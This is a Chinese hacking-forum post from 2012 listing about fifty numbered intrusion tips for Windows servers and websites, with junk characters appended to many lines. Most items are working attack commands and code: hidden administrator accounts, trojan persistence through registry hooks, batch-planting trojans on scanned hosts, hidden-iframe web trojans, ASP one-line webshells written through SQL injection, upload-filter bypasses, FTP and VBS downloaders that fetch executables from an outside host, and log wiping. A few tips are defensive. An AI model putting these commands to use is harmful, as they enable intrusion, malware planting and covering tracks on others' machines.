找回密码
 立即注册
查看: 2841|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,' t1 Z2 S# O# V/ D" z8 u; s" z
cacls C:\windows\system32 /G hqw20:R
# \* o! N4 d4 h  O# O& _9 k9 y思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
$ o$ G2 s0 `. N8 y' K恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
- L4 m; p' }' l# \6 c& f7 g6 F; T* s0 o  J
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
8 e8 t4 j" A1 y4 \2 u% W, [$ ]# F2 C, B( R! P5 |8 y
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。1 s+ Q. B' s2 Z$ i
; Z2 @! a/ V5 h* j7 Q
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
2 K9 \) }' T. \# q' W; r  K1 i1 C! @: z, h4 W: n# t% j0 e  \' B
5、利用INF文件来修改注册表* e: x: F8 I, a2 q3 |" M
[Version]% W# [6 {. k: [( p
Signature="$CHICAGO$"
2 ]% U- I6 j0 u( ]# I  {* L[Defaultinstall]
+ }  A. w% A/ }addREG=Ating
! R/ `3 ^, \: c9 v[Ating]5 M% x. w6 `  n( _" G2 j
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
# H  C8 G, f% K, v" i9 V以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:5 d: J7 E; V9 K1 P5 X) _- _' w% V; r
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
0 J- x; l. V* e" Q0 _5 \其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
8 P: y# Y5 \) W; p$ yHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
" L0 h+ O2 }' _! E& a: v2 X  l7 ]/ EHKEY_CURRENT_CONFIG 简写为 HKCC( M; w* O& y, b' A/ S9 E0 I3 y' s
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值8 A: o8 {! `8 V4 ^+ i
"1"这里代表是写入或删除注册表键值中的具体数据
- H6 J9 c+ G  ^! g+ t( m' U% d
- T1 S3 |5 r% B7 O: R0 K6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
/ i2 \5 D& N% }多了一步就是在防火墙里添加个端口,然后导出其键值
" N! m6 i/ f5 C* W/ u[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
4 i% m2 J; e) ~( U- ?& b* G, W
  z1 k3 h. Y  Z) h3 o7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
( _6 o3 a1 x' O& ]/ G" c% m在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。/ J$ i" \+ [2 N) v: h

; x/ b3 t6 N( d8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。. ]  E  H# E: X5 e  _

3 \: b7 m; _1 j& ]4 H  Y9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,, [) h0 w5 s$ T  J8 z0 K
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。1 I4 `6 k% R9 z7 x. x* \3 X' W5 s
1 F" V" P! ^6 F/ ^( K- s
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”/ @- }( V7 L. z; S/ U# d% o

8 ?- K/ p5 |* W/ ]11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
7 z6 D& |7 g( Z% E4 w; I7 O用法:xsniff –pass –hide –log pass.txt# \/ {5 v' `3 N  i$ j0 B& `2 F
. F$ `5 Z- }$ g6 x4 V
12、google搜索的艺术( _% o' B$ r+ K) S: T
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
% B. U9 |* b0 H* ^或“字符串的语法错误”可以找到很多sql注入漏洞。
; L: b! Y: E4 F) E2 D3 z# b/ Y% @" l  h% G
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
: A4 R1 v8 s3 q+ z! O/ T
# y5 |- T, }/ x0 P14、cmd中输入 nc –vv –l –p 1987
5 x6 h/ C& w  u+ b3 @做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃1 D" q1 @0 q: Q
7 p/ j; U5 E) I4 U! Q1 @: H6 w' x) \
15、制作T++木马,先写个ating.hta文件,内容为
- D; M- M' @( X* ?<script language="VBScript"># e/ ]# r, _5 [) `# [, ~8 u; @
set wshshell=createobject ("wscript.shell" )5 d7 c% D, f; }" }
a=wshshell.run("你马的名称",1)
; F) `$ d, b- j' \. ]1 Owindow.close
' x0 D1 ]1 N3 i& T5 R</script>  \9 Y" T$ ~+ J6 M& m
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
2 }% p4 z9 Y1 U3 t! ?* Z
, l% }. m, u( b/ S3 ~16、搜索栏里输入
0 q: o3 T0 z9 F" b' @, l, t& x关键字%'and 1=1 and '%'='
. l' r0 f# e: H( R% D8 Y7 ]关键字%'and 1=2 and '%'='
/ A$ S5 ~% ~2 Z" E- t7 @9 I/ K比较不同处 可以作为注入的特征字符
1 U. S5 M* @) ]) u: W: D# i" C" C2 Q- o" P$ D- H5 y) X
17、挂马代码<html>
) {- x% O  F6 Z/ O; z<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
2 O" \2 B* b' M. y# i( J& `6 ?% K( m</html>
( t% ?4 d( c! a$ I4 f1 L
/ K, T- p3 a$ c8 @3 W. W: Y& b18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
4 Y4 ]0 @; _) J1 x3 h0 d  N6 D! T" Unet localgroup administrators还是可以看出Guest是管理员来。
0 a) s7 x+ ?6 P1 n; w1 y
3 o( D- A" I* H; `$ t% {2 r$ g19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等9 P' S8 r8 Y$ W) \  n
用法: 安装: instsrv.exe 服务名称 路径
4 Y8 k0 T6 X) l+ L$ J5 s. N3 d卸载: instsrv.exe 服务名称 REMOVE6 M( V+ f6 R: ?8 x" g& C
* E9 e: C' m. C* Z
0 E: \# p! M6 ]8 m
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉! w7 L. J7 [' D9 q
不能注入时要第一时间想到%5c暴库。
, I: d6 J. Q0 ]8 F, e+ J. I& A! A1 Z8 N; d* \  s) ~9 x1 H5 r5 w
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~! M* d. {* y5 ?

; H5 [  p7 w6 q2 }23、缺少xp_cmdshell时- d1 i1 Y6 k3 q1 x6 a1 c
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll': Z$ ]7 G3 }6 |9 ~
假如恢复不成功,可以尝试直接加用户(针对开3389的)3 T/ [) ~0 r7 u2 h, f* r
declare @o int
0 w% D: d: {( ~) s% P. qexec sp_oacreate 'wscript.shell',@o out$ Z' |, X3 z- k: a0 `
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
# }& G, L! V  |: B2 ~: r1 ]9 |- _* M' E1 w3 p* {' c0 p8 ~% H3 T3 {9 H
24.批量种植木马.bat
+ \5 S# J/ c- @( K% P5 Q7 tfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
3 B! W+ o! J- }& l- C' ]for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间5 }/ }! l9 z  C5 X1 d
扫描地址.txt里每个主机名一行 用\\开头$ c& ^4 t, [7 `3 V9 R5 d( B
8 j! b# \1 W/ q0 W' A
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
  l+ t5 g! s$ ~- Z0 S
, b& j; e9 f1 Q( p# x26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
' Y& ~& @7 I  r9 Z将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.+ t" V: m/ m2 D9 q5 g+ E5 ?0 e4 U
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
0 _  l5 M3 q, P+ J! `( w2 O6 X. y, k( E; v, j7 [/ j
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP6 O; `. j# W) T; A* A" _: n9 E6 A' \$ o$ c
然后用#clear logg和#clear line vty *删除日志* S6 n. T  S" U! j
2 z# p1 O, ~; s
28、电脑坏了省去重新安装系统的方法
6 N; B4 [1 n- [, F/ J, k6 X纯dos下执行,% q2 g5 S& v2 O1 b4 Q
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config: A- J$ N7 ?+ t( D
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config8 E# w7 O2 p/ P1 M* Q
4 E# e( U1 [+ Q+ p2 i+ ]6 b) z! R* \
29、解决TCP/IP筛选 在注册表里有三处,分别是:8 W1 w" {0 U7 a% l; {6 |
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip+ |& X$ ?; g1 Z3 W1 N3 B  k
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
/ p1 E) M+ {& Q, k1 u7 k- RHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip! ?  l8 T' k7 o1 O- U
分别用
7 w! b- @# q0 x, tregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip$ N) \; p% o- V2 H1 _3 \
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
! @+ M: g+ ?1 v3 H+ vregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6 w, o  N4 U) Y1 |6 j
命令来导出注册表项6 S9 z5 ^8 q4 h2 N& d' N8 `( q( W4 K2 r
然后把三个文件里的EnableSecurityFilters"=dword:00000001,. i! a+ @: ~7 R% B4 z. x
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
; Z/ E* x. C; V* J; O' z  k' H0 N( b: Oregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。! @- ^: y1 v- S$ {: `

: W, ]0 u9 O% Y& B$ e30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U- Y7 s7 P; l. }& m
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3! K; f& M. Z0 {8 M7 ^: G2 v
; d  B* r9 }3 ~% X5 o, {
31、全手工打造开3389工具# \& |0 d$ X! q. O
打开记事本,编辑内容如下:
! M# O1 G- X; s$ q$ y( pecho [Components] > c:\sql3 N2 x0 U7 a8 h, c
echo TSEnable = on >> c:\sql+ G5 k: t  a, [# \; F' b# O
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q4 U; V" E8 Z8 k/ k. [
编辑好后存为BAT文件,上传至肉鸡,执行. s6 j) Z+ f# R& j

1 ~  n1 ~/ S8 M9 e7 S1 g$ J( `% e32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
  |" H- L6 X* ^1 k) r% n" u5 k1 P6 J- v: s, C
33、让服务器重启
* B+ Z- j0 v# b% B, e) c写个bat死循环:
% K7 h- w4 n5 v( w. X@echo off) C0 z* [1 m2 Q0 X
:loop1& ?0 L! o* V$ S  L
cls5 u: J9 e8 Y: a, `1 x
start cmd.exe# r6 f$ @, S$ V# \" o
goto loop1. F/ e5 @; P( Q5 ~; V
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启- ?0 M) c7 i1 x. k* A8 R& c
  n( u2 O+ y2 C4 l0 u
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
4 c( L6 B, k- X) M# e1 K@echo off; [4 }7 ^" h' X( l5 s
date /t >c:/3389.txt
4 O5 ?4 S2 V4 B8 k1 ^6 q( {0 Otime /t >>c:/3389.txt* X8 M& q0 J5 k  j1 g$ l
attrib +s +h c:/3389.bat
! z, ?5 `. T# E, sattrib +s +h c:/3389.txt2 Q7 [) f, Z$ t& Q2 s
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
% u1 S& c$ p6 J2 r" P8 K" d/ ^并保存为3389.bat" n7 Z$ r$ B/ J
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号* V. s7 k+ R; t# ^8 f3 ~
. \! i/ g' n, A/ `/ b! B
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
6 G2 \: M6 Q+ S) \) f3 Dstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)" x& I& \: F# R0 d  Z- r/ ]' M
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。: }! z5 I5 o6 h/ @, K

: q; D$ r7 \4 p9 e$ f+ G4 Y9 M36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
) w, M, |7 o# q  Q1 t' i* C# oecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
$ w9 j" y# w$ ]( |echo 你的FTP账号 >>c:\1.bat //输入账号- ^- @, l+ M/ ?/ f. F) P
echo 你的FTP密码 >>c:\1.bat //输入密码
, B: E3 m, d! S- Y. Xecho bin >>c:\1.bat //登入& w. R% E/ g. p
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
, x2 W7 M+ R9 P: C+ P+ T/ N$ ]echo bye >>c:\1.bat //退出1 _: l# t" X: G- G, c4 E, j. w# y
然后执行ftp -s:c:\1.bat即可
& x' J. o1 }  U/ r
1 E) K+ {1 V6 Z37、修改注册表开3389两法0 Q1 K0 x$ Z) X9 a3 V
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
; h- X* }: \# a8 f( hecho Windows Registry Editor Version 5.00 >>3389.reg
& ?" x6 F; Y( r8 u4 Q% lecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg( Q, I% I, e: g' t
echo "Enabled"="0" >>3389.reg5 x; l# c. j* q: D  ^
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
! r0 R& N! u" Y" t2 ?6 I( oNT\CurrentVersion\Winlogon] >>3389.reg) d. q! R' T1 W
echo "ShutdownWithoutLogon"="0" >>3389.reg
9 V1 q* i  p$ m/ l6 U6 Techo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
4 {- I! N1 a+ u" L>>3389.reg+ ~3 q* [* K/ }9 |' _( F
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg( Z1 C' Z. l* r* d! E% Y+ [' b
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]3 C+ `* u$ @. a4 G
>>3389.reg% u; x1 P: h% I  s
echo "TSEnabled"=dword:00000001 >>3389.reg5 b. k2 z- ~2 j2 x% I% G: z
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg- Y; B5 W3 B2 a) ]% o
echo "Start"=dword:00000002 >>3389.reg. e: M- \  l# r2 h" n; a+ G
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]8 O7 O, i5 p! ~6 c
>>3389.reg
; s& m! |  E. A& i( y4 B8 Zecho "Start"=dword:00000002 >>3389.reg* _* H5 w. P) D+ {; f
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg$ Q/ [0 E; @, H- A% Z7 |: J$ W2 }
echo "Hotkey"="1" >>3389.reg: Y5 \  b5 X3 ]; m  r+ R
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
7 m5 ]# z$ [. S$ w* ^' b. S7 U  |; ~/ l0 {Server\Wds\rdpwd\Tds\tcp] >>3389.reg
: ?- q* B" _' E5 {% U" E+ o8 M6 Pecho "PortNumber"=dword:00000D3D >>3389.reg& k% q: U) H) C! l
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal0 ]. \# k+ i6 S; U9 G
Server\WinStations\RDP-Tcp] >>3389.reg
3 `8 f  _5 X  j/ ?( Q8 J! B! fecho "PortNumber"=dword:00000D3D >>3389.reg- c! d1 L5 g8 s6 G0 N% R& o+ |
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
& y/ U7 ?2 l8 j) b1 d(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
1 F  _/ i3 Z9 N  o/ g" P因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
) I, A; S5 U2 j(2)winxp和win2003终端开启8 N, \0 }. Q+ d& Z
用以下ECHO代码写一个REG文件:
2 R* `" k) O3 s% L+ ?% Lecho Windows Registry Editor Version 5.00>>3389.reg4 h# ^. R8 R! N9 n: T8 y; R
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal6 D! S6 K4 P) c
Server]>>3389.reg
; v8 ~' s9 S9 Q/ j/ Iecho "fDenyTSConnections"=dword:00000000>>3389.reg
7 p: M& T" e/ _4 N3 D4 X' z+ k( Uecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal- T% v+ M8 A( Q/ n7 _
Server\Wds\rdpwd\Tds\tcp]>>3389.reg. r4 D: Y& T, C5 K, _  O
echo "PortNumber"=dword:00000d3d>>3389.reg
  B! P/ f; d0 @& K( L1 Qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
: y* e6 ?3 x% ^' k0 GServer\WinStations\RDP-Tcp]>>3389.reg
; W: Q% C. n. q7 C  h$ Gecho "PortNumber"=dword:00000d3d>>3389.reg: t0 t( A$ _5 l; h, [
然后regedit /s 3389.reg del 3389.reg* X6 h1 h; H7 w6 Y5 N$ d
XP下不论开终端还是改终端端口都不需重启# q+ ~3 M/ ^8 o& U0 r7 @

- B( k+ F& h$ P5 E38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃7 K. r3 \5 q$ w4 O
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
. I  A5 x8 i. `& @2 x0 y+ {2 [8 Q5 ^7 [. T  l3 o
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
* B4 \" O% C- P# }(1)数据库文件名应复杂并要有特殊字符1 h. ~( p& t. C
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源4 d* m+ S) {+ p5 r( }7 C
将conn.asp文档中的
% R* O% v0 R( E  e2 @DBPath = Server.MapPath("数据库.mdb")
/ [9 P5 Z+ S) J7 d% q2 _+ Jconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath4 l  R2 Z9 O2 z7 \! M
  C% [3 w6 J; E8 W9 F! q$ j
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置8 g: r$ T2 S) k: j
(3)不放在WEB目录里: X+ I7 E4 g3 Z! m: e7 m* ]
2 y! a, H. F1 \  h
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉# K+ |; s# I4 z/ |/ y+ C
可以写两个bat文件
7 \- Q9 z1 N8 q- P# t@echo off) t% M! x$ g: N4 K+ H4 d8 A
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe7 o5 B$ l4 ?0 u4 F" I8 U, W
@del c:\winnt\system32\query.exe3 \3 `# F  a6 L3 [
@del %SYSTEMROOT%\system32\dllcache\query.exe: d+ f" `* f7 @6 g( g4 j: w+ M
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
2 E0 x' i2 ~6 a1 C# ]# B* p) R, c/ D0 ]2 X  \% F
@echo off
# Y8 H' f5 f1 W+ L& [@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe- U9 n+ M) _5 T6 L) I
@del c:\winnt\system32\tsadmin.exe
: ~8 Z+ K: Q) l  A+ J; }# x/ B# r7 ^: v@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
1 [0 p9 H; r0 v, C1 ]9 C' Y- h4 C0 H6 L/ }9 R! M  f# D- E
41、映射对方盘符3 [% c9 R1 X6 f3 p
telnet到他的机器上,- _/ A- _# \0 Z
net share 查看有没有默认共享 如果没有,那么就接着运行3 |$ a/ q7 y2 Y! M
net share c$=c:
- o5 l1 M7 H5 G8 M" G0 r" anet share现在有c$- B* T$ Q) B8 y5 K% O2 t* s* o
在自己的机器上运行3 X: u" S9 J, h) W( [: Z
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K3 x+ |5 d8 e3 G5 r9 X

& M/ q4 [' w! |6 p- W9 j( Q42、一些很有用的老知识2 a% T. |5 H2 r- q  g& \) @' N
type c:\boot.ini ( 查看系统版本 )1 E7 F# ]/ O3 U2 M+ _% {
net start (查看已经启动的服务)2 ]' N% a, Y; _) v5 h$ n  @
query user ( 查看当前终端连接 )
! ^; Z% V% ]  F! A- `' ]net user ( 查看当前用户 )8 ~' {$ v" R$ @+ T7 K
net user 用户 密码/add ( 建立账号 ). P* i$ _& W* t6 Q% C: s
net localgroup administrators 用户 /add (提升某用户为管理员)
5 J4 C: Q5 `/ Z, V5 B& [* V) bipconfig -all ( 查看IP什么的 )4 \* Z1 _5 Y8 |2 e: B2 v! B0 }# N
netstat -an ( 查看当前网络状态 )0 H, p- K0 e9 H$ L9 [0 X
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)+ |- r; u/ N2 x$ ?; q0 ~2 y/ P
克隆时Administrator对应1F4
# O3 Q! _+ J' r0 [0 mguest对应1F5' i) C8 I8 V- \& R( N: Q% ?0 b
tsinternetuser对应3E8+ S# t" T0 d, Y, t9 k. f

4 y6 R8 G# `+ B43、如果对方没开3389,但是装了Remote Administrator Service8 n/ V* }# ^$ s& s! t4 C
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
; h' z! h8 B' y* Y解释:用serv-u漏洞导入自己配制好的radmin的注册表信息( i( ], ?2 }# `+ J
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"! ~* d+ R) ~0 M! `; }0 |) O
$ q; _6 E" ]2 T  p
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
( i( h( R& t& [" m本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
% `# E% j  g: ~: }' N) u. H8 I' A* z7 |6 e! G
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
  y* v! V" a! \9 y% yecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
  E2 u4 q3 \) Y! }8 ?^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =- \- |( ?/ w0 {1 s" o# u
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =, D8 a8 H: s2 U2 x$ i3 a: U$ y( V
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs: i" {! A  ]/ X2 z$ v3 }8 |
(这是完整的一句话,其中没有换行符)4 @5 ?: O1 {/ W( o8 V
然后下载:6 }) o2 Y' w9 C, `  J5 V8 O2 i" Q" V
cscript down.vbs http://www.hack520.org/hack.exe hack.exe) `) z) P6 O+ B$ ?$ V# k9 M5 X
, l# W( K$ |6 W; z  B1 U5 u
46、一句话木马成功依赖于两个条件:8 d( I4 I$ H! m2 n% w( n2 n4 o
1、服务端没有禁止adodb.Stream或FSO组件/ a; c$ T0 s# ~- O
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
, @# o1 w7 O5 u: [* M% F9 w9 T) _: C$ ~: c& G; f
47、利用DB_OWNER权限进行手工备份一句话木马的代码:8 u+ E( `$ ^* s. u) _  E
;alter database utsz set RECOVERY FULL--' Q; F: t* s1 d9 x+ S3 J
;create table cmd (a image)--' {6 S2 i+ t; V. \; X% t
;backup log utsz to disk = 'D:\cmd' with init--2 B: T+ D, `+ W
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--& f$ z- U) c" W7 a
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
# h+ W6 c- N" i3 A+ O( [注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。, Y/ i# W, _) m" J! O* g  q

0 t4 R. h3 m% N; s48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:5 u9 m$ _9 c9 T& ?3 j- M) s

9 ^8 \9 \2 V9 n/ ~4 A, j2 P; y4 P* H用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options, Y. B/ F* ~" [: L
所有会话用 'all'。  k* |5 b) ~$ P6 H) \' {6 e; ?/ w
-s sessionid 列出会话的信息。
5 y, u' B+ T9 C" g+ \+ s" ~-k sessionid 终止会话。9 _& j4 H  b* [' V
-m sessionid 发送消息到会话。
/ a# O. b6 I9 ?- `. y" G% [5 ]& E9 e* J& D" F
config 配置 telnet 服务器参数。1 _/ h. \/ B: ~
, }, s$ K% [  g; d( Y
common_options 为:
" B5 L9 U5 z% q; r8 q-u user 指定要使用其凭据的用户
  S2 ^4 q3 s$ Y7 B; y$ ]% ]( S-p password 用户密码
! e. n" B* Z9 s! C: U& W, ]  D; ?, K, m& G0 s
config_options 为:
( D$ c% B& d) g  \( Q8 x! V. w  tdom = domain 设定用户的默认域
+ ]2 w4 m7 D( H+ c  Jctrlakeymap = yes|no 设定 ALT 键的映射7 O  P$ b8 X7 J& I6 \5 ?6 w9 v% L
timeout = hh:mm:ss 设定空闲会话超时值
# I' E! W! J, W) n1 n$ ^timeoutactive = yes|no 启用空闲会话。
8 s# r4 O- d* ^4 R4 o; Z4 imaxfail = attempts 设定断开前失败的登录企图数。5 F+ \8 W9 K4 Q' i
maxconn = connections 设定最大连接数。
3 l# |) G$ m" v4 Gport = number 设定 telnet 端口。5 [( S4 O& G! |! C$ b& J' k+ r
sec = [+/-]NTLM [+/-]passwd7 y9 x' W$ o9 d: \8 i$ }
设定身份验证机构5 W/ [  J7 z, q4 T3 T
fname = file 指定审计文件名。! f0 I/ P1 ~: H5 u0 Y' u$ u" H, W! y
fsize = size 指定审计文件的最大尺寸(MB)。
  E3 {9 h9 x( i; X$ l( omode = console|stream 指定操作模式。7 ?! o2 f* I  K$ ~" P* ?8 T! {
auditlocation = eventlog|file|both. e- C: c& W  m- t; n
指定记录地点8 X4 P% \% I  e0 z3 w) H4 f1 V
audit = [+/-]user [+/-]fail [+/-]admin/ g5 q4 T: p0 Z& X3 x* C
% _- Y' w  Y' k& S9 o3 S6 K! Z6 ^! ]
49、例如:在IE上访问:
/ u2 E' y$ j6 k$ F- i' twww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
9 ~# w' q3 i, E! @1 T2 ohack.txt里面的代码是:
2 \  M# z6 ], I8 Y+ T# T7 h<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">: H/ X( W: E+ U) \/ c6 a
把这个hack.txt发到你空间就可以了!  E% G( E: u2 A- Y
这个可以利用来做网马哦!
5 P0 e# B6 \3 T( m! I  z
* a7 `" p! _. C' E50、autorun的病毒可以通过手动限制!, P' e& C9 N; ?7 M
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!' C+ D( [! O* \
2,打开盘符用右键打开!切忌双击盘符~+ r; O6 `" z4 m; x# a
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
& \: [6 s+ s: C4 _8 K# \, T9 M% L3 t  ~' C7 {) ~
51、log备份时的一句话木马:* X  V( G; Y" Y4 M2 K; U
